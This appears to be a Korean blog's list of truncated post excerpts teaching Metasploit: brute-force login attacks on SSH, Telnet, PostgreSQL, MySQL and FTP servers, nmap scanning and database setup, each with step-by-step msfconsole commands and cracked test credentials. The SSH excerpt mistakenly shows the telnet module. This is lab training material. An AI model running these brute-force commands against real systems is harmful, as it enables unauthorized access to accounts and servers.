Metasploit을 활용해 Brute-Force 공격하기(SSH 서버) * SSH 서버로 무차별 대입 공격하기 1. 공격 모듈 설정하기 # use auxiliary/scanner/telnet/telnet_login 2. 공격 대상의 PC로 Telnet 서버를 통한 무차별 대입 공격을 한다. # set rhosts [공격대상 IP] # set user_file /root/users.txt # set pass_file /root/passwords_test.txt # set stop_on_success true # set threads 256 # run 실행 결과는 다음과 같다. ssh 서버를 통해 id: root / pw : 1234 로 로그인이 성공한 것을 확인할 수 있다. 위에서 알아낸 계정으로 ssh..
Metasploit을 활용해 Brute-Force 공격하기(Telnet 서버) * Telnet 서버로 무차별 대입 공격하기 1. 공격 모듈 설정하기 # use auxiliary/scanner/telnet/telnet_login 2. 공격 대상의 PC로 Telnet 서버를 통한 무차별 대입 공격을 한다. # set rhosts [공격대상 IP] # set user_file /root/users.txt # set pass_file /root/passwords_test.txt # set stop_on_success true # set threads 256 # run 실행 결과는 다음과 같다. telnet 서버를 통해 id: root / pw : 1234 로 로그인이 성공한 것을 확인할 수 있다. 위에서 알아낸..
Metasploit을 활용해 Brute-Force 공격하기(PostgreSQL 서버) * PostgreSQL 서버로 무차별 대입 공격하기 1. 공격 모듈 설정하기 # use auxiliary/scanner/postgres/postgres_login 2. 공격 대상의 PC로 PostgreSQL 서버를 통한 무차별 대입 공격을 한다. # set rhosts [공격대상 IP] # set rport 5432 # set user_file /root/users.txt # set pass_file /root/passwords_test.txt # set stop_on_success true # set threads 256 # run 실행 결과는 다음과 같다. postgressql 서버를 통해 id: postgres /..
Metasploit을 활용해 Brute-Force 공격하기(MySQL 서버) * MySQL 서버로 무차별 대입 공격하기 1. 공격 모듈 설정하기 # use auxiliary/scanner/mysql/mysql_login 2. 공격 대상의 PC로 MySQL 서버를 통한 무차별 대입 공격을 한다. # set rhosts [공격대상 IP] # set rport 3306 # set user_file /root/users.txt # set pass_file /root/passwords_test.txt # set stop_on_success true # set threads 256 # run 실행 결과는 다음과 같다. mysql 서버를 통해 id: root / pw : 1234로 로그인이 성공한 것을 확인할 수 있..
Metasploit을 활용해 Brute-Force 공격하기(FTP 서버) - Brute-Force : 특정 암호를 풀기 위해 무작위로 대입하는 공격 * FTP 서버로 무차별 대입 공격하기 1. 실습을 위해 대상 PC에서 root 계정의 패스워드를 쉽게 바꾸어 놓는다. # use mysql; # update user set password=password('1234') where user='root'; # flush privileges; 2. 칼리 리눅스에서 crunch로 대입공격 할 캐릭터 셋 설정을 한다. # cat /usr/share/crunch/charset,lst 위 내용들 중에서 앞에서 설정한 계정에 대한 공격을 위해 numeric을 사용한다. 3. 다음 명령어를 사용하여 패스워드 파일을 만든다..
능동적 정보 수집 - 공격 대상에 직접적으로 접근하여 정보를 획득하는 방법 능동적 정보 수집을 위해 포트 스캐닝을 실습 해 보았다. 포트 스캐닝 대표적인 툴 nmap을 msfconsole 환경에서 사용한다. * 열려있는 PORT, 방화벽 등 정보 수집 1. 다음 명령어를 사용하여 nmap을 실행시킨다. # nmap -sT -sV -O [대상IP] 결과를 보면 대상 IP의 PC가 허용하고 있는 포트를 확인할 수 있다. 2. 결과를 데이터베이스에 저장하려면 다음 명령어를 사용한다. # db_nmap -sT -sV -O [대상IP] 3. 데이터베이스에 저장된 내용을 확인한다. # db_service
Metasploit을 활용해 사전 정보 수집을 위한 DB연결 방법 1. 수집한 데이터를 저장하기 위해 데이터베이스를 활성화 한다. # service postgresql start //postgresql 서비스 시작 # update-rc.d postgresql enable //postgresql 서비스 활성화 # msfdb init //msfdb 초기화 2. msfconsole을 실행시킨다. # msfconsole 프로그램을 실행시키면 현재 사용 가능한 여러 도구들의 카테고리들을 볼 수 있다. 3. 연결상태를 확인한다. DB상태를 확인 시 postgresql에 연결되어 있는 것, 데이터베이스에 저장되어 있는 정보가 없는 것을 확인할 수 있다. # db_status //db상태 확인하기 # db_servic..
Metasploit 개요 MSF란? - 보안 문제를 식별하고, 취약점을 완화하며 보안평가 기능을 제공한다. - 보안 테스팅을 위한 일종의 통합 체계로 모듈화 된 구조를 가지고 있다. 활용분야 - 모의해킹, 취약점 진단, 제로데이 진단, 취약점 분석, 자동화 도구 개발 용어 정의 - 익스플로잇(exploit) : 시스템, 애플리케이션, 서비스 등의 취약점을 공격하는 방법 - 익스플로이테이션(exploitation) : 익스플로잇을 하는 행위 - 후속 공격(post exploitation) : 익스플로잇이 성공한 후 수행하는 공격 - 취약점(vulnerability) : 시스템 또는 소프트웨어에 존재하는 결함 - 페이로드(payload) : 쉘코드, 최종 공격 목적 코드 - 모듈(module) : 루비에서 ..
